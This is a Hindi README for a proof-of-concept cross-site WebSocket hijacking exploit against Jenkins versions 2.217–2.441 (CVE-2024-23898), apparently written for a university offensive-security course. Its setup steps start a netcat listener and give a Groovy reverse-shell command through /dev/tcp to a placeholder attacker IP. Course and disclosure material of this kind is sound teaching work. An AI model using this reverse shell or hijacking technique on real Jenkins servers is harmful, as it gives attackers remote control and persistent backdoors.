
CVE-2024-23898 के लिए एक प्रूफ ऑफ कॉन्सेप्ट क्रॉस-साइट वेबसॉकेट हाईजैकिंग एक्सप्लॉइट — Jenkins संस्करण 2.217-2.441 को प्रभावित करने वाली एक भेद्यता। कार्नेगी मेलन विश्वविद्यालय में हैकिंग और ऑफेंसिव सिक्योरिटी पाठ्यक्रम में शैक्षिक उपयोग के लिए।
CVE-2024-23898 के लिए एक proof of concept क्रॉस-साइट WebSocket हाइजैकिंग शोषण — यह एक भेद्यता है जो Jenkins संस्करण 2.217-2.441 को प्रभावित करती है।
यह शोषण Jenkins CLI को लक्षित करता है, जिसका उपयोग Jenkins नियंत्रण सर्वर पर दूरस्थ रूप से पहुँचने और कमांड जारी करने के लिए किया जा सकता है। इस शोषण के माध्यम से, एक दूरस्थ हमलावर Jenkins नियंत्रण सर्वर तक पहुँच प्राप्त कर सकता है और एक स्थायी बैक-डोर स्थापित कर सकता है, यदि कोई प्रशासक लक्षित Jenkins नियंत्रण सर्वर में लॉग-इन होने के दौरान किसी दुर्भावनापूर्ण साइट पर जाने के लिए धोखा खा जाता है।
यह कोड केवल शैक्षिक उद्देश्यों के लिए है और केवल कार्नेगी मेलन विश्वविद्यालय में Hacking & Offensive Security पाठ्यक्रम के उपयोग हेतु है। इस कोड का उपयोग हथियार बनाने या मैलवेयर तैयार करने के लिए नहीं किया जाना चाहिए। लेखक ऐसे किसी भी प्रयास की स्पष्ट रूप से निंदा करते हैं।
nc -l <port_num> के साथ एक netcat लिसनर शुरू करें (<port_num> को किसी भी अप्रयुक्त पोर्ट नंबर से बदलें)ipconfig getifaddr en0 कमांड से पा सकते हैं[http://localhost:8080/script](http://localhost:8080/script) पर जाएँ। यदि आपने पहले से नहीं किया है तो एडमिन खाते से लॉगिन करें।['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()